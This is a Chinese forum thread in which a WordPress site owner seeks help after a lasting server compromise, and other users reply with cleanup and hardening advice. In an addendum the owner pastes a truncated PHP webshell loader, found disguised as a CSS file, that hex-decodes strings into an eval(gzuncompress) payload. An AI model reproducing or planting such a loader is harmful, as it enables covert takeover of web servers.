V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
Myprincess
V2EX  ›  云计算

网站被严重攻击,请推荐如何防护?

  •  
  •   Myprincess · 2021-01-26 03:08:12 +08:00 · 3178 次点击
    这是一个创建于 1379 天前的主题,其中的信息可能已经有所发展或是发生改变。
    从 2021 年开始,网站受到严重攻击,被植入挖矿木马。从开始的被 sbl 封站封锁 Ip 到 netcarft 一周一次警告,到现在2天一次警告。我对安全运维不是很了解,木马病毒会自动创建文件。比如 pk6,删除后自动更新复位。密码早改为 28 位都没用,几乎是秒黑。会创建一个 alfacgiapi 文件。木马查杀不了,但是在 wp 论坛上看到有人说这是一个木马的文件。也删除的。目前实在没办法。我把目录权限设置为不可写入 555 。

    有没有 v 友知道这个要如何处理。很多变种的木马,删除不干净。
    第 1 条附言  ·  2021-01-26 11:06:58 +08:00
    ?>
    <?php
    $password='123456';
    $shellname='123456';
    $myurl=null;
    error_reporting(0);
    @set_time_limit(0);
    function Class_UC_key($string){
    $array = strlen (trim($string));
    $debuger = '';
    for($one = 0;$one < $array;$one+=2) {
    $debuger .= pack ("C",hexdec (substr ($string,$one,2)));
    }
    return $debuger;
    }
    header("content-Type: text/html; charset=gb2312");
    $filename=Class_UC_key("2470617373776F72643D27").$password.
    Class_UC_key("273B247368656C6C6E616D653D27").$Username.
    Class_UC_key("273B246D7975726C3D27").$Url.
    Class_UC_key("273B6576616C28677A756E636

    我打包下载了,然后用卡巴扫描,发上这个在IMAGES下的CSS他是是木马病毒。
    第 2 条附言  ·  2021-02-07 18:15:19 +08:00
    附上木马扫描文件。
    https://mp.weixin.qq.com/s/cWYYNyNo_yGdKnGWICGUvg
    我感觉我想保留网站的机率不大了。
    不怎么要怎么处理。
    26 条回复    2021-03-17 08:38:44 +08:00
    Myprincess
        1
    Myprincess  
    OP
       2021-01-26 03:11:36 +08:00
    我已经连续收到 netcarf 警告了。那些木马好像会自己攻击对方,但是有一个木马比较厉害 pk6 。全自动创建。怎么也删除不掉。其他文件名是变化的,只有这个不会改变。求助一下。
    Myprincess
        2
    Myprincess  
    OP
       2021-01-26 03:17:14 +08:00
    创建的木马有:PK6/ID3/CL7/ALFA-DATA/IXR/,然后一些是乱码的。但是 Pk6 的比较狠,其他的都删除了,只有这个删除不了,会自动不断的创建。还会自动上传主题,他们自己的主题,不是我用的主题。
    Myprincess
        3
    Myprincess  
    OP
       2021-01-26 15:13:10 +08:00
    结贴,花了几百,找人清除。
    markgor
        4
    markgor  
       2021-02-05 09:29:09 +08:00   ❤️ 1
    不是你删除不掉,之前处理过,但并非 WP 的,
    流程是在各个入口文件都加载了 木马生成的文件,
    有些通过判断 reffer,直接反问的话就正常执行,搜索引擎过来的就运行。
    运行的时候会 curl 去一个 IP,load 对应的文件下载进来。
    意味着你在删除木马的时候,任何一个访问都有可能导致木马被重新加载。
    正确做法可以停站,检查代码,删除木马部分代码,删除木马下载的文件,再开站。
    Myprincess
        5
    Myprincess  
    OP
       2021-02-05 12:34:11 +08:00
    @markgor 大哥,帮我处理可以吗?多少钱。我被折腾个半死。我现在已经绝望了。现在做的就是把所有目录权限设置不可写入。无法开启,没办法修改网站内容,如果打开,两下就被木马搞。netcarft 老是警告。SBL 老是封我。我想重新安装,但是数据会没有掉,因为我之前是复制了我原来旧的网站内容,但是在新的网站我修改了很多内容,变成我新的网站没办法重新安装 。目前已知木马:寄生虫,一句话木马,还有挖矿木马,还有一个叫什么木马不知道,还有一个叫 WP WALL.使用云锁都锁住还是被破解。我只是一个企业网站,主题插件用的都是付费的。我已经处理了 30 多天没解决掉,也请人处理,但是基本上秒挂。我现在要怎么处理。每天使用 root 帐号登陆的有 1300 多个,每天都是。
    markgor
        6
    markgor  
       2021-02-05 13:43:04 +08:00   ❤️ 1
    你这不是网站被黑了,你是整台服务器被黑了...
    排查思路基本是删除可疑账号,修改管理员密码,看进程是否存在可疑的,看日志登录和破解的方式。
    然后检查登录脚本是否有异常,crontab 列表是否异常。有的对饮删除掉,
    最后主机正常后才开始排查 web 页面漏洞。


    因为没有日志和详细信息支撑,只能猜想你是用高权限账号跑的 web 业务,从而导致主机被黑...

    帮我处理可以吗?多少钱。<---主机漏洞堵塞,木马病毒删除,再到 web 的漏洞处理和堵塞。。。。 这些操作下来的费用,估计你直接重建站点都够了。而且后续是否还会因为其他漏洞导致被入侵,也不好说.更不好定责,哪怕你找深信服 /绿盟那些机构帮你做安全评测,他们也不敢和你保证处理完检测报告内容日后不会出现问题...

    所以,最实际的情况建议:
    1 、自己有运维能力,建议关停网络,控制台进入尝试先排除异常系统账号,再检查 crontab 和进程内容,把木马 /异常的结束了,然后检查登录脚本和各种 rc.local 运行脚本等,是否被挂了。然后再去检查 /修复 web,最后开启外网和加固安防配置,等几天看结果。

    2 、停机,做个镜像,把数据 /文件导出,修复程序文件被挂马的地方,数据库文件也是,我记得之前看过 wp 某部分代码是丢数据库里的;完成后就重装系统,把处理好的程序和数据库恢复。


    3 、不知道你的是什么官网,但我觉得仅仅官网那么简单没必要上 WP 吧?随便租个阿里虚拟主机(服务器运维部分也节省了),找人开发下站点,基本就完成了。
    markgor
        7
    markgor  
       2021-02-05 13:50:52 +08:00
    如果是讨论技术的,按上面建议尝试排查清除即可。
    如果是讨论其他的,我就想不明白,如果单一正规官网 ,为何不找建站公司帮你弄呢,几千块就完事了,而且出事了都包维护,运维也省了,就自己加加资料就完事了........
    markgor
        8
    markgor  
       2021-02-05 14:02:37 +08:00
    对了,关于网页挂马,给你完整的补充

    #先关站,允许的情况下最好断网,通过控制台 /本地 进入操作。
    1 、检查 mysql 权限,确定 outfile 不能导出到 datadir 外的目录或者直接禁止使用。
    2 、检查 PHP 涉及上传相关的源码,特别是编辑器的 demo 。
    3 、排查已经被写入的木马源码,建议人工检阅,发现后直接删除。
    4 、检查数据库里被污染的数据。
    5 、增加 WAF 进行拦截,免费的一大堆,有条件也可以用收费的。

    机器被入侵:
    #最好断网,通过控制台 /本地 进入操作,所有操作前必须先做备份,云服务器直接做个镜像。
    1 、检查异常账号并删除;
    2 、检查异常进程,并结束;
    3 、检查启动项,确保没有木马;
    4 、检查登录脚本,删除异常的;
    5 、检查 crontab ;
    6 、权限配置,按最小权限原则进行,已有账号密码进行修改。服务类账号不需要给登录权限。
    7 、升级系统,可以的话直接 yum upgrade 。<---最近有个 sudo 提权,不知道和你这里有没关系。
    8 、重新走一次 1~5 的检查,确保过程中木马没有修改你删除 /修改过的东西。
    idragonet
        9
    idragonet  
       2021-02-06 08:20:53 +08:00
    估计网站代码的漏洞.........之前拿第三方 PHP CMS 搭建网站也是是不是挂马,自己.NET Core 写网站清静了。
    Myprincess
        10
    Myprincess  
    OP
       2021-02-06 11:06:36 +08:00
    @markgor 感谢你的答复。非常感谢。我打算重装安装。放弃原来的数据。
    为表谢意,有两个选择。
    一。你告诉我地址与收件人信息,我给你寄一张京东E卡,面值200元。
    二。你加我微信,我给你转200元微信红包。
    我微信号:v2 名+cn
    Myprincess
        11
    Myprincess  
    OP
       2021-02-07 10:41:15 +08:00
    @idragonet 我买的都是正版主题与插件。应该不是第三方的问题,早上打开邮件,又收到警告。被挂马。无解。
    yuguorui96
        12
    yuguorui96  
       2021-02-08 09:18:41 +08:00
    建议上云,云厂商对于这种攻击是有一定防护能力的。
    markgor
        13
    markgor  
       2021-02-09 14:05:05 +08:00
    @Myprincess 好意心领,这个就不需要了,我只是来摸鱼的时候碰到。而且我也没帮你做什么,上面的也只是之前经验之谈罢了
    Myprincess
        14
    Myprincess  
    OP
       2021-02-09 14:31:33 +08:00
    @markgor 谢谢,你的答复对我帮助很大。

    这两天维护成功,没有被干掉。但是攻击力度增加了 20 多倍。之前是一天 1300 次。现在一天是 24100 次。还包括 SSH 暴力攻击。目前已知黑客名字有两个,一个好像还是组织来的。叫 anonymousfox 。他在网站后台已经创建一个管理员帐号,并且这个帐号无法删除与修改。只要我删除,网站肯定挂。还有一个叫 HeartXploit 。来源地法国的技术不错。他能用我未公布的资料尝试。包括用户资料,登陆帐号,包括根本不展示的跳转域名,我不知道他们是哪来的这么多 ip 。从 1 月 1 号到今天,应该尝试 wp-login 登陆的帐号与 Ip 至少有 25 万个了。这些在我禁止扫描端口的情况下还能这样。但奇诡的事,他们不删除我网站的内容,只挂木马。
    markgor
        15
    markgor  
       2021-02-09 14:55:47 +08:00
    看了下你的站点,又是 wp+WooCommerce 组合....
    给你个建议,如果这个站点是你们业务支持来源,那么找个建站公司去做吧,别用 WP 了。
    WP 由于功能复杂,算是 PHP 里面运行最慢的一个 CMS 类系统了,基本 PHP 相关的性能测试,都会已 WP 进行。
    另外,我并不是说 WP 不好,只是它不适合国内环境,你进插件市场安装插件,你进后台点击升级,我没记错都是不能直接进行吧? WP 的服务器 ban 了大陆的 IP 。
    还有,WP 插件太多了,就算内核也好,几天就一补丁,几周一升级,因为网络原因,很少人会勤劳升级,最终导致被黑了....
    如果你重装,并坚持使用 WP,给你以下建议。

    1 、装纯净系统,我习惯的是 CENTOS 7,你可以用 UBUNTU 、debian 之类的,反正就是选择自己习惯熟悉的。除了 win
    2 、升级,yum upgrade
    3 、创建 NGINX 账号、组,禁止登陆。
    4 、下载 NGINX,MARAIDB,PHP 7.2(记得是 7.2)源码,编译安装,编译参数只是 user 和 group 对应 nginx 。网上有教程,不难。
    *如果需要性能,编译 PHP 7.2 的时候可以跑 prof-gen,训练 GCC 。编译完开启 opcache 。
    5 、下载编译 openrasp,百度出品的开源 rasp,openrasp 好像只支持 PHP 到 7.2,根据 openrasp 文档进行配置。
    6 、下载编译 ModSecurity,NGINX 版本的并进行配置。
    7 、下载编译 fail2ban,配置 SSH 爆破。顺便修改 ssh 的端口。
    8 、iptable/firewalld 入只开放 80 、443 、SSH 端口(修改后的),出不做限制。 机器的,不是控制台那个。(如果你不需要远程 mysql,iptable 把 mysql 端口也封了)
    9 、创建 web 目录,配置 NGINX 、PHP-FPM 、mariadb 账号秘密都用 nginx 账号、组(之前创建的),并赋予 web 目录相应权限。
    10 、启动服务,安装 WP
    11 、WP 升级,安装对应插件,(我记得 WP 有关于安全类的插件,官方的,用免费版即可)
    12 、可以安装 WP 自动备份插件,但是实际情况下我建议你 crontab 写个 mysqlDump 脚本备份数据库到 web 不能被访问的一个目录,然后 tar 压缩整个目录进行自动备份。


    我看你是用腾讯云的,你可以订阅下安全通知,有漏洞会第一时间提醒的,不需要开收费,用免费版即可。
    如果觉得上述操作麻烦,你可以安装个宝塔,上述提到的( PHP\NGINX\MARIADB\PHP 7.2\OPENRASP\WAF )在宝塔里都有,而且免费。(自己能搞定的话就没必要上宝塔)
    markgor
        16
    markgor  
       2021-02-09 15:01:31 +08:00
    @Myprincess
    SSH 暴力攻击<----安装 fail2ban,yum 装即可。配置 SSH 爆破。 另外,ssh 端口一定要修改,别用默认的。
    他在网站后台已经创建一个管理员帐号,并且这个帐号无法删除与修改。 <---如果直接进 mysql 删除或修改呢?
    应该尝试 wp-login 登陆的帐号与 Ip 至少有 25 万个了<------为什么你不修改 wp 默认登录地址呢?
    Myprincess
        17
    Myprincess  
    OP
       2021-02-10 16:12:28 +08:00
    @markgor 我搞不定,目前我处理方式如下 :因为管理员有三个,两个为黑客帐号。所以我把三个管理员设置了 2FA 。就算权限再高,他也很难登陆。有装防火墙,但是 user.ini 好像改不了,无法设置。目录锁死,不能上传,不能写入,不能更改。昨天一天攻击次数已经达到 4.09 万次了。越来越猛。但是网站没有被更改,有好转。就这样,用到服务器到期再想办法。我就是用宝塔+云锁。关闭22端口没用,我试过很多次都没用。我看记录,他们是下载那个 wp-config 文件。你所说的那个登陆地址的没用。我改了,他们重新定向。anonymousfox 这家伙十分歹毒。技术很高。大多数的攻击都能跑过机器审查。
    dyt5
        18
    dyt5  
       2021-02-11 05:11:50 +08:00 via Android
    @Myprincess 怕是被法航攻击了
    Myprincess
        19
    Myprincess  
    OP
       2021-02-14 14:53:18 +08:00
    @dyt5 法国航空吗?目前情况越来越差。在全部锁死情况下,他能不断上传到WP-ADMIN可执行文件。管理员被我删除的,依然可以上传。文件防改也不行。IP显示大多数来自法国。2FA也不行。不知道他们想干啥。一个网站也没有价值。
    markgor
        20
    markgor  
       2021-02-16 17:14:32 +08:00
    你就不怀疑一下已经被挂马了吗...
    被挂马后后续操作其实登录不登录 WP 意义不大....
    Myprincess
        21
    Myprincess  
    OP
       2021-02-16 19:44:27 +08:00
    @markgor 知道。但是处理不了,木马服务于这个网站: https://newms-shop.su/
    上传的非常多的 PHP 文件中,名字不一样,但是内容一模一样。全部指向这上面这个网站,别乱点击。
    Myprincess
        22
    Myprincess  
    OP
       2021-02-16 19:52:18 +08:00
    @markgor 木马制作者还利用图片格式保存。命名 screenshot.png 格式,逃避检测。并且 755 权限,不能删除。
    webshe11
        23
    webshe11  
       2021-03-05 05:29:54 +08:00 via Android
    好家伙 这都被日成筛子了
    不了解贵司情况,如果业务价值较高,建议别在网上瞎找网友,去联系安全公司购买应急响应服务 应急事件处置服务 渗透测试等服务吧
    webshe11
        24
    webshe11  
       2021-03-05 05:40:54 +08:00 via Android
    仔细看了一下,markgor 说的很对,但是你没有能力估计自己搞不定,惨
    Myprincess
        25
    Myprincess  
    OP
       2021-03-08 14:58:26 +08:00
    @webshe11 是的,我现在已经扛住 20 多天了。
    cockrellw
        26
    cockrellw  
       2021-03-17 08:38:44 +08:00
    抓包,写到网站或者程序里面拦截掉,
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3535 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 35ms · UTC 10:41 · PVG 18:41 · LAX 02:41 · JFK 05:41
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.